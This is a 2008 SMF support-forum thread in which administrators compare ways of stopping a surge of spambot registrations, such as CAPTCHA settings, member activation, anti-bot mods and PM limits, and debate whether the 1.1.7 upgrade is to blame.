Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs ad haven't seen it happen since. A number of forums were hit by the same user name.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 13, 2008, 06:19:55 PM
Quote from: rvforumite on November 13, 2008, 03:41:45 PM
Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs ad haven't seen it happen since. A number of forums were hit by the same user name.

I wonder if it was the same spammer that hit me as well, that was a little over two years ago for me, haha.  Up'd my PM capabilities ...required 50 posts first before a member can PM.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 13, 2008, 06:24:33 PM
His user name in a number of forums was Robert Thompson (or Thomson). I'm still gun shy from the after effects of that one, and still only manually turn on PMs for folks I've observed to be good forum citizens, or folks I know personally. Also added other PM constraints like minimum number of posts, maximum number of PMs from the same IP in a given time, use of CAPTCHA, etc. Call me paranoid, but I still have the wounds from the complaints and having to explain the whole thing individually to several thousand unhappy campers.

I was online at the time, saw him register, come into the forum, then send PMs. Thought it was strange, then received a PM from another member with a heads up and a copy of his message. But the damage was done before I could react.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Bill.Ramby on November 13, 2008, 06:40:01 PM
Quote from: Muldoon on November 13, 2008, 06:19:55 PM
Quote from: rvforumite on November 13, 2008, 03:41:45 PM
Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs ad haven't seen it happen since. A number of forums were hit by the same user name.

I wonder if it was the same spammer that hit me as well, that was a little over two years ago for me, haha.  Up'd my PM capabilities ...required 50 posts first before a member can PM.

Same here. Hhmmm.

I went into the database and deleted all those PM's then I had to do a recount on my forum.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rokuez on November 13, 2008, 08:51:15 PM
thanks for this thread .   having botnets auto register over at my eiiiforum.com


http://www.stopforumspam.com/forum/t344-There-Spammer-Forum-List-Somewhere <--- SMF coders need to make this plugin


didn't read thru entire thread, but i hope someone writes this plugin ^^^^ see link!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 09:01:20 PM
I've been thinking about it. I've tried to interest other parties. We have some young, budding mod authors that this would be perfect for.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 13, 2008, 09:12:17 PM
Don't look at me...

I can't even open that link, let alone have any idea what's involved in making this mod. :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 13, 2008, 09:55:42 PM
Here's the correct link (http://www.stopforumspam.com/apis), but I have no idea what to do with it
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: debbiet on November 13, 2008, 10:35:03 PM
Great work!!

I was on 1.1.5 and started to get a flood of spam registrations the other day. I upgraded to 1.1.7 and no change, then I found this forum post. Awesome info, and it's comforting to know the coders here care so much about it!

Anyway, I tried various changes, but the only that worked so far was changing captcha to high - no further spam registrations so far during the past hour. I know it's probably a temporary fix, so I want to implement something better. So it's either an upgrade to version 2 beta, or install reCaptcha.

I have a question about the mods though. I have no problem w/ editing code, but I just wanted to understand. There is no actual install, right? I have to manually change the code, as stated in the instructions, right?

Sorry for the silly instructions, but I basically run an unmodded install, so it's new to me.

and one last question. The next time I upgrade the forum, the modded code would probably be overwritten, right? So I would need to edit the code all over again?

Just trying to get things straight before I make a decision on which way to go this weekend. It might be easier to update to version 2.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: surlyman on November 13, 2008, 10:44:25 PM
I increased the complexity of the captcha, set the minimum age to 18, and installed the "anti-robot registration puzzles" mod.  Confirmed that they were all working.

Got another spammer today after applying the above fixes.  Could be coincidence as it's a totally different IP and this one was the standard pharmaceutical pitch we get from time to time whereas the recent spam attacks was mostly porn links.  Then again, maybe not.

I'll try adding the "Are you human" mod and see if that does anything.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: catfished on November 13, 2008, 11:19:17 PM
Quote from: surlyman on November 13, 2008, 10:44:25 PM

Got another spammer today after applying the above fixes.  Could be coincidence as it's a totally different IP and this one was the standard pharmaceutical pitch we get from time to time whereas the recent spam attacks was mostly porn links.  Then again, maybe not.

I'll try adding the "Are you human" mod and see if that does anything.

I'm convinced that these instances of one or two spammers getting in are simply manually registered by humans (well, not quite human:-) and have nothing to do with the large spambot attack we're dealing with.JMHO
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ArrayInteractive on November 13, 2008, 11:38:32 PM
Quote from: debbiet on November 13, 2008, 10:35:03 PM
I have no problem w/ editing code, but I just wanted to understand. There is no actual install, right? I have to manually change the code, as stated in the instructions, right?

If you haven't done any hacking to your original forum code, then mods should install quite easily using the packages panel in the admin. I can't believe how easily the auto mod installs work!

Last night I updated to 1.1.5, then 1.1.6, then to 1.1.7 and all my older mods I had installed still work fine. Not sure if that would be case upgrading to version 2 though.

---

One day since I inplemented some antispam measures, and I've already got six pages of error log entries, spammer guests who are banned. Guess I must have entered a few key IPs into the ban list.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on November 14, 2008, 12:39:40 AM
I only had one spammer when all of this started, and he was a human. He posted a few posts on subject before the spam post. -Gone now ;D
I have seen a drastic increase in the old   /index.php?action=quickmod2;topic=155.0
exploit attempt in the last 2 days- a little over 30 in 2 days.  previously, I was getting just a couple a week. They seem to be coming from everywhere. I can't help but wonder if they are related in some way.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: TempusFugit on November 14, 2008, 02:32:19 AM
One thing I've noticed is that all spam accounts have hidden email.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ephralon on November 14, 2008, 02:57:26 AM
This thread is full of great solutions to prevent bot registrations, but registered bots are not my problem.

My 1.1.7 is overrun by guest spam posts in poll threads. Yesterday I disabled guest postings and yet they again posted almost a dozen messages full of junk links. And always in polls. Now I locked all polls, but I can't leave it like that forever.

All the anti spam mods that prevent guests from posting links do not work with 1.1.7, and when I try to manually update nospambyguests or antispam the package manager tells me the files are corrupted.
I think about adding nospambyguests to post.php manually, but I'd hate to resolve to a cheap hack like this.

Guests may only use the seach and view attachments and polls, I took away all other rights.
What can I do to make them stop posting in polls?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Martje on November 14, 2008, 06:11:15 AM
thanks for all the info, very usefull and helping to have a fast solution. this reminded me that I should have renewed my chartermembership :)
[edit] done, that was easy with paypal[/edit]
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 14, 2008, 08:56:39 AM
I have in the last few days been hit with spammers, and I never was before.
I immediately switched registration to approval, which has killed the spam, but not the signups.

I have changed the registration agreement to ask applicants to email me with just enough detail that I know they know what the forum is about - and I quite like this idea permanently as I am sick of people (even humans) cluttering up the user database when they never even intended to post.

Unfortunately my average user doesn't have the aptitude to email me (I have spotted people I actually know in the unactivated registrations list - but they didn't follow the advice to email me!).  Having looked at the mini-quiz  option for weeding out bots, I realise my average user would not be able to pass that test.  The increased difficulty visual image thingy is beyond what my eyes could manage and I know some of my typical users are as bad as me in that way.

So, what I really want (and I have had this on some forums I have registered at myself) is a form to be presented to the applicant for them to freely enter some text saying why they would like to join.  And then I will continue to use the Approval system.   It's not a busy forum, so I am happy to go on approving registrations indefinitely.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 09:16:33 AM
I've taken over Karl's mods for the Are You Human? and Anti-Bot Registration Puzzles. I'm going to look into providing an addition to one of them, to add 2-3 questions that you pick yourself, along with answers you pick yourself. This is the same feature that SMF 2 has. I think just this small addition will result in everybody having just slightly different patterns from the robots' point of view, enough so that it should prove very difficult for them. I will announce it in this topic if I manage to add the functionality, probably to are You Human?.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: debbiet on November 14, 2008, 09:32:13 AM
Quote from: ArrayInteractive on November 13, 2008, 11:38:32 PM

If you haven't done any hacking to your original forum code, then mods should install quite easily using the packages panel in the admin. I can't believe how easily the auto mod installs work!

Last night I updated to 1.1.5, then 1.1.6, then to 1.1.7 and all my older mods I had installed still work fine. Not sure if that would be case upgrading to version 2 though.

Thank you! I had a bit of permissions trouble w/ the packages, but after a helpdesk ticket to my host, I resolved it, and the package worked just perfectly. Thanks!!!

I added the reCAPTCHA mod, and so far so good!

thanks to all that help out here at SMF, I am very grateful!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on November 14, 2008, 09:33:30 AM
PLEASE make usable on ALL basic themes (Babylon)! :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: denzil69 on November 14, 2008, 09:39:23 AM
easiest way to find a spam member:

i place new username into google and look at how many forums they have been joining recently.
once i get past 10 different forums and they have never posted in any of them, its easy to spot.

ive increased membership security to approval for the time being.
one thing i did immeadiately was to remove the option to view genuine member email addresses.
i figured that even if they did manage to register, they couldnt be viewed so they would get in but get nothing.

thanks for the heads up
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 09:44:23 AM
Quote from: denzil69 on November 14, 2008, 09:39:23 AM
easiest way to find a spam member:

i place new username into google and look at how many forums they have been joining recently.
once i get past 10 different forums and they have never posted in any of them, its easy to spot.

Only problem with that, some bots are programmed to make up new names for each registration.
This means, this tactic is good for most, but not all spambots.
However, I commend you for the good thinking. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: johnnymax on November 14, 2008, 10:12:13 AM
"Are you Human" worked so far!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 10:35:37 AM
I must be losing it. I recall seeing a post by someone suggesting several additions to a .htaccess file, but I can no longer find it. Might have been removed due to a camouflaged 4-letter word.

Anyone have a copy of the suggestions and know if they work?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bootnut on November 14, 2008, 10:41:59 AM
Hi i didnt want to use mods, changed these two settings

Method of registration employed for new members: Member Activation
Complexity of visual verification image: high

thats stopped all bot attacks on my forum, not had a single one get through since! seams the bots dont like to click on the email links :)

I noticed that i couldnt read the thing on high, if i have trouble i assume my members will, so i changed it back to medium, if the bots come back ill change it back to high or look at something else
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 10:47:48 AM
Quote from: rvforumite on November 14, 2008, 10:35:37 AM
I must be losing it. I recall seeing a post by someone suggesting several additions to a .htaccess file, but I can no longer find it. Might have been removed due to a camouflaged 4-letter word.

Anyone have a copy of the suggestions and know if they work?

I'm not aware of any post discussing .htaccess being removed from this topic. In any case all I can think of is using .htaccess for IP banning, and I continue to believe that trying to ban IP addresses, email domains, etc., is a waste of time, due to the fact that there are so many different spammers involved in this attack. You would end up playing Whack-a-Mole, banning the ones who have already spammed and headed for better pickings. Instead, follow the suggestions in the OP and the various additional tips throughout the topic.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Dgui on November 14, 2008, 10:49:06 AM
Update (pun intended):   :)

We updated from 1.1.2 to 1.1.7 one version at a time to get around language file problems and it went just fine.

Installed reCAPTCHA and turned off Member Approval, it seems to be working.

Deprecated, thanks for the great topic, it was a BIG help.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rsmini on November 14, 2008, 11:07:21 AM
Just to let you know my joomla site was hacked 3 days ago by a Turkish hacker who left a political message (and audio) on the home page.

Yesterday they deleted the whole smf forum and the whole joomla website. I have been running 1.1.6 for some time now and recently noticed a big increase in users from gmail and .ru

I thought disaster had struck and we were doomed. Now I find I am not alone which is in a way a relief. My host had a very recent backup and they have reinstalled for me.

I changed the joomla/smf bridge config to make sure it goes through smf registration when a new member joins. Also set to 'member activation' and increased visual activation and password strength to high. I will also install the suggested mods as well. Also upgraded to 1.1.7

I will also set about banning all @mail.ru accounts as well

They really are  a pain in the rear end
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 11:08:47 AM
Dgui,

You're welcome. It is unusual that so many people have the same problem at the same time, so I thought it was merited to spend a few hours in my attempt to come up with a comprehensive post that could cover it all. That's so much easier than spending days giving out the information piecemeal to one person and one topic at a time.

As far as I know the advice in the OP is still the best thing to do, and as far as I know the advice works and the spamming is stopped. Particularly the third mod, a bit more complicated to install than the first two, but I don't see how it would be possible for the bots to get past the reCAPTCHA mod unless the forum is not properly configured.

I predict that eventually they will get smarter, but I also predict that in that eventuality we will just get tougher and we'll do whatever it takes to keep them out. We have no other choice. Our forums won't work if we let them in. This is life or death for us, or at least it is for our forums and our SMF software.

The only time we rest is when they are not getting in. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rsmini on November 14, 2008, 11:24:34 AM
I should also say a massive thank you to you for responding to this problem and explaining how to get around the problem. You have certainlly put my mind at rest

THANK YOU

;) ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 11:34:54 AM
QuoteI'm not aware of any post discussing .htaccess being removed from this topic. In any case all I can think of is using .htaccess for IP banning, and I continue to believe that trying to ban IP addresses, email domains, etc., is a waste of time...

I must have been thinking of another topic, or maybe even another forum. I've been reading anything and everything I can find on spam, vulnerabilities and exploits the last few days.

FWIW the suggestions weren't to ban IP addresses; I think we all know that's fruitless. IIRC the suggestions included preventing the inclusion of <script> and a few others in a URL from using said script for unintended purposes, such as described in this article (http://www.viruslist.com/en/weblog).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 14, 2008, 11:53:34 AM
SMF doesn't allow HTML in posts (unless you've disabled that security), so the only way that code could be inserted is through a security hole.

ephralon, look at Visual Verification Options (http://custom.simplemachines.org/mods/index.php?mod=734) or Advanced Visual Verification (http://custom.simplemachines.org/mods/index.php?mod=907).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Pere Escobar Solsona on November 14, 2008, 12:02:47 PM
Quote from: ephralon on November 14, 2008, 02:57:26 AM
This thread is full of great solutions to prevent bot registrations, but registered bots are not my problem.

My 1.1.7 is overrun by guest spam posts in poll threads. Yesterday I disabled guest postings and yet they again posted almost a dozen messages full of junk links. And always in polls. Now I locked all polls, but I can't leave it like that forever.

All the anti spam mods that prevent guests from posting links do not work with 1.1.7, and when I try to manually update nospambyguests or antispam the package manager tells me the files are corrupted.
I think about adding nospambyguests to post.php manually, but I'd hate to resolve to a cheap hack like this.

Guests may only use the seach and view attachments and polls, I took away all other rights.
What can I do to make them stop posting in polls?

Try the Advanced Visual Verification 1.2-Fixed MOD (http://custom.simplemachines.org/mods/index.php?action=download;mod=907;id=54231); the CAPTCHA options include registration, guest posts and PM's.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 12:02:56 PM
Quote from: rvforumite on November 14, 2008, 11:34:54 AM
I must have been thinking of another topic...

I recall seeing that post now, referring to <script>. It was at SMF but if it's not in this topic then it was in a different topic. I'm not going to go back and look for it.

As MC says, there isn't any need for that in a properly configured SMF, and in this respect SMF's default settings are proper. Just don't enable member use of HTML.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 01:40:33 PM
Apologies that this seems to have gone off on a tangent. No intentional hijacking of the topic.

I have html disabled in SMF, but the recent attacks haven't been limited to spam posted in SMF or, for that matter, limited to spam. As I said, I've been reading anything and everything I could get my eyes on related to any kind of vulnerability, and some (much?) of it has blurred. Again, apologies for the unintended diversion.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 01:50:11 PM
That was one of the points of the OP, that people who were speculating that this was some kind of security vulnerability. It has nothing to do with any security flaws.

The spam attack is not related to SMF's security. It's just a new and possibly coordinated attack on SMF's settings the way that forums are usually configured.

All you need to do to stop it is to reconfigure your SMF, and possibly to install one of the three modifications.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: catfished on November 14, 2008, 02:02:56 PM
Quote from: Deprecated on November 14, 2008, 12:02:56 PM
Quote from: rvforumite on November 14, 2008, 11:34:54 AM
I must have been thinking of another topic...

I recall seeing that post now, referring to <script>. It was at SMF but if it's not in this topic then it was in a different topic. I'm not going to go back and look for it.


I recall that one as well but after doing a fairly thorough check through my original thread that started all this action ;D and the other locked thread, I couldn't find it. I'm still pretty sure it's in one of those two threads: http://www.simplemachines.org/community/index.php?topic=273648.0
http://www.simplemachines.org/community/index.php?topic=273701.0
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 02:19:37 PM
QuoteAll you need to do to stop it is to reconfigure your SMF, and possibly to install one of the three modifications.

Understood.

For clarification, I haven't (yet) seen any of these recent SMF-related attacks, but have been actively reviewing my settings and learning what else I need to do to keep it that way. Apologies if I ask dumb &/or irrelevant questions in the process.

So far, I've changed three things since becoming aware of the issue, two as a result of this discussion:


A high percentage of my forum members are near or over retirement age and, as I anticipated, the higher CAPTCHA level is inhibiting some bona fide new registrations. (Getting old is tough.)

I've been trying to install a couple of the mods but ran into some issues which I'm still working through.

I'll add my thanks for starting this topic and collecting everything in one place.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mchero on November 14, 2008, 03:35:24 PM
I have been in constant combat for the last three days! Some of the videos that where getting posted even made me turn red! WOW!
Updated to 1.7 & awaiting 2.0 final! I don't have manu users on my site so I enabled registration & that put a hold on attacks!

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 05:13:50 PM
Rest assured, these attacks are NOT only against SMF forums.
I am staff at 2 VB forums and 3 ProBoards forums, and those forums are also under attack.

This spambot war is getting really tiresome... :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: darkfrontiers on November 14, 2008, 05:32:35 PM
Quote from: Deprecated on November 11, 2008, 11:39:07 PM
Quote from: Muldoon on November 11, 2008, 11:32:22 PM
Thanks Motoko-chan.  I'll delete them all and look at installing these mods.  I have never used them before...  Will there be issues with TinyPortal then?

Please report what worked for you and your TP installation. We need user reports of what works particularly in situations I couldn't test due to my not running any TP or any 1.1.7 production forums.

If you have a combo that works with TP we'd like to hear it.

Yeah, sorry. I am a bit new to this board. Well. I have tried everything that was mentioned here. And nothing has worked.

Sir, you say that it is unrelated to 1.1.7, I am afraid that I am going to have to call false. Ya see, I did not upload 1.1.7 until yesterday (had never had a problem with spammers before), after reading about all the problems. I figured that after doing everything you suggested that I could mitigate the problems. So I uploaded, and instantly started getting spammers. Several dozen within the first few hours. I then added the recommended stuff. Still getting spammers. I have had to go to admin approval, and this has caused me to loose several real new members.

Ya may want to come out with a 1.1.8 that deals with these problems.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Oldiesmann on November 14, 2008, 05:35:16 PM
The spam bot problems have nothing to do with the 1.1.7 update. It's just a coincidence. Have you tried the reCaptcha mod?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 05:39:15 PM
Quote from: darkfrontiers on November 14, 2008, 05:32:35 PM
Yeah, sorry. I am a bit new to this board. Well. I have tried everything that was mentioned here. And nothing has worked.

Sir, you say that it is unrelated to 1.1.7, I am afraid that I am going to have to call false. Ya see, I did not upload 1.1.7 until yesterday (had never had a problem with spammers before), after reading about all the problems. I figured that after doing everything you suggested that I could mitigate the problems. So I uploaded, and instantly started getting spammers. Several dozen within the first few hours. I then added the recommended stuff. Still getting spammers. I have had to go to admin approval, and this has caused me to loose several real new members.

Ya may want to come out with a 1.1.8 that deals with these problems.


Please read the post right above yours.
This attack is NOT only against SMF forums, so how can it be because of SMF 1.1.7?
The fact that attacks at your site started after you did 1.1.7 are purely coincidental, the spambots would have hit there at that time, no matter what version you were running.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 05:42:02 PM
/me chuckles ;)

Yeah, I guess I probably don't know what I'm talking about. Just think about it, almost 2,700 wasted posts. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 05:54:03 PM
Dumb question time ....

During registration, if someone can't read the CAPTCHA image and clicks on "Listen to the letters", is it possible for a spam bot to be configured to decipher the sound which, after all, is just a digitized version of it?

If so, where's the setting to turn off the sound? (SMF 1.1.7)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 05:59:29 PM
Another dumb question ....

Any advantage in setting the password requirement to High (mixture of different characters)? Presumably, the bots are programmed to try various combinations and difficulties of passwords.

Just curious - does "mixture of different characters" mean letters and numbers, or does it include/require characters such as *!?/ etc?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 06:03:31 PM
I also have a few "dumb" questions:

1. Why make these danged spambots in the first place? :P

2. Why do people take so much joy out of other people's misfortune?

3. Why double post when there is such a nifty button named: Modify ?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: fths on November 14, 2008, 06:09:48 PM
Quote from: darkfrontiers on November 14, 2008, 05:32:35 PM

Yeah, sorry. I am a bit new to this board. Well. I have tried everything that was mentioned here. And nothing has worked.

Sir, you say that it is unrelated to 1.1.7, I am afraid that I am going to have to call false. Ya see, I did not upload 1.1.7 until yesterday (had never had a problem with spammers before), after reading about all the problems. I figured that after doing everything you suggested that I could mitigate the problems. So I uploaded, and instantly started getting spammers. Several dozen within the first few hours. I then added the recommended stuff. Still getting spammers. I have had to go to admin approval, and this has caused me to loose several real new members.

Ya may want to come out with a 1.1.8 that deals with these problems.

We had the spambot problem on the two boards where I am an admin BEFORE we upgraded to 1.1.7.  At the time we upgraded it was in hopes that it would solve our problems.  It didn't. 

We also tried the "Whack a Mole" method of banning IPs, domains, and/or email domains in some cases.  While our ban log shows a great many of the spambots' attempts were thwarted by these bans, they obviously found their way around with other IPs and email domains because the problems certainly persisted. 

Adding the age limit seems to made no change in the pace of new profiles and spam. 

This morning we installed the Anti-Bot Registration Puzzles that Deprecated pointed us to and much to our relief, this has stopped the problem.. at least for now.  Simply checking "Who's Online" it can plainly be seen that attempts are still made by similar overseas IPs, but the registrations are not going through and there have only been legitimate newbies.

Like others before me in this post, a thank you goes to Deprecated for the advice and a thread with everything in one place for this problem. 

darkfrontiers it might help to try one of the modification packages that Deprecated mentioned HERE (http://www.simplemachines.org/community/index.php?topic=273816.msg1793950#msg1793950)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 06:19:27 PM
Quote from: rvforumite on November 14, 2008, 05:54:03 PMDuring registration, if someone can't read the CAPTCHA image and clicks on "Listen to the letters", is it possible for a spam bot to be configured to decipher the sound which, after all, is just a digitized version of it?

That was investigated by SMF team members checking their hosting logs, and it turned out that the sound code was not being accessed.

Quote from: rvforumite on November 14, 2008, 05:54:03 PMAny advantage in setting the password requirement to High (mixture of different characters)?

What does passwords have to do with registering? You don't need to trick out passwords if you're a spambot since you are supplying your own password, like any normal person registering.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 06:22:09 PM
I agree with Deprecated.
These spambots most likely are programmed to do highly secure passwords, because of the different settings people have for password requirements.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 06:22:17 PM
Quote from: BurkeKnight on November 14, 2008, 06:03:31 PM
I also have a few "dumb" questions:

1. Why make these danged spambots in the first place? :P

I'm sure you haven't spent much effort thinking about it. It's simple: money. They get paid to spew spam.

Second point, it's not joy at our misfortune (the word is "schadenfreude" by the way), it's just that our misery doesn't matter to them. They're in it for the money, and spamming is big business.

Finally, give me your forum URL and I'll go make some double posts for you! :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 06:24:14 PM
Quote from: Deprecated on November 14, 2008, 06:22:17 PM
Quote from: BurkeKnight on November 14, 2008, 06:03:31 PM
I also have a few "dumb" questions:

1. Why make these danged spambots in the first place? :P

I'm sure you haven't spent much effort thinking about it. It's simple: money. They get paid to spew spam.

Second point, it's not joy at our misfortune (the word is "schadenfreude" by the way), it's just that our misery doesn't matter to them. They're in it for the money, and spamming is big business.

Finally, give me your forum URL and I'll go make some double posts for you! :P

First two were basically joke questions.
The last, well, only if you give me your forum URL...LOL
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 06:27:44 PM
Quote from: BurkeKnight on November 14, 2008, 06:24:14 PMThe last, well, only if you give me your forum URL...LOL

Sure thing dude! http://www.simplemachines.org/community/ :)










<-------- Got one in my profile too, and you're welcome to join! ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 06:28:31 PM
Quote from: DeprecatedThat was investigated by SMF team members checking their hosting logs, and it turned out that the sound code was not being accessed.

Thanks, I missed that. But I guess it will only be a matter of time.

Quote from: DeprecatedWhat does passwords have to do with registering?

Maybe I could have worded the question a little better, but passwords are a part of the registration process. If I require more complex passwords, simple passwords supplied by bots won't work, and they can't register. But ....

Quote from: BurkeKnightThese spambots most likely are programmed to do highly secure passwords, because of the different settings people have for password requirements.

Thanks, that answered my question.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 06:30:03 PM
Quote from: Deprecated on November 14, 2008, 06:27:44 PM
Quote from: BurkeKnight on November 14, 2008, 06:24:14 PMThe last, well, only if you give me your forum URL...LOL

Sure thing dude! http://www.simplemachines.org/community/ :)










<-------- Got one in my profile too, and you're welcome to join! ;)

Ditto, on both. ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 06:30:34 PM
Gotcha podner! ;) :P :D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: darkfrontiers on November 14, 2008, 06:45:30 PM
Quote from: BurkeKnight on November 14, 2008, 05:39:15 PM

Please read the post right above yours.
This attack is NOT only against SMF forums, so how can it be because of SMF 1.1.7?
The fact that attacks at your site started after you did 1.1.7 are purely coincidental, the spambots would have hit there at that time, no matter what version you were running.

Yeah, I have several boards. One on vbulletin, and one on phpbb. I have not had any problems with these.

I also did not start having problems on my SMF board (eventhough others had) until after I went to 1.1.7.

From the others talking I may be correlating without causation. I am just trying to get all the information as well trying to give all my information.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: LiveFight.com on November 14, 2008, 06:45:47 PM
My site is getting absolutely hammered with about 25 a day.

im on 1.1.5 as i cant get 1.1.7 to work.

So it aint the version.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on November 14, 2008, 06:46:12 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
In recent days there has been a huge surge in the numbers of spambots attacking SMF 1.1.x forums. Some have suggested that this is due to the recent SMF 1.1.7 security upgrade, but in fact the attacks are unrelated to the functional changes in SMF 1.1.7. This is supported by the fact that SMF 1.1.6 and earlier versions are also subject to the attacks. The attacks have nothing to do with the SMF 1.1.7 upgrade.

Hmm, I got 5 SMF 1.1.7 forums running. None of them were ever attacked. Now 3 are within the last few days. The forums are on very different servers. And another forum I visit a lot was attacked this morning... for the first time ever!

Maybe it's a coincidence.. I think not.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 06:49:32 PM
Quote from: akyhne on November 14, 2008, 06:46:12 PM
Hmm, I got 5 SMF 1.1.7 forums running. None of them were ever attacked. Now 3 are within the last few days. The forums are on very different servers. And another forum I visit a lot was attacked this morning... for the first time ever!

Maybe it's a coincidence.. I think not.

I have 2 1.1.7 forums that are not under attack.
I am staff of 2 VB forums and 3 ProBoards forums, that are under attack.
I have several people that run SMF 1.1.5 and 1.1.6 that are also under attack.
This clearly tells me, that SMF 1.1.7 is not the problem.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: metallica48423 on November 14, 2008, 06:53:05 PM
indeed.  This is more of a generalized spam attack.

I've heard from many service providers as well of servers being hammered.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 07:02:21 PM
Let's all remember too that no single one of us has a large enough collection of servers and SMF sites to have a statistically significant sample. It doesn't fuse into a statistically significant survey until you combine all the data from a large number of observations. The combination of SMF and all its members IS a big enough sample statistically speaking to have valid data.

The data indicates that the spam attacks are not related to the 1.1.7 upgrade, and that makes sense because the 1.1.7 upgrade has nothing to do with keeping spammers out. (Or at least I'm told that. I haven't personally verified it by a code inspection.)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 07:12:19 PM
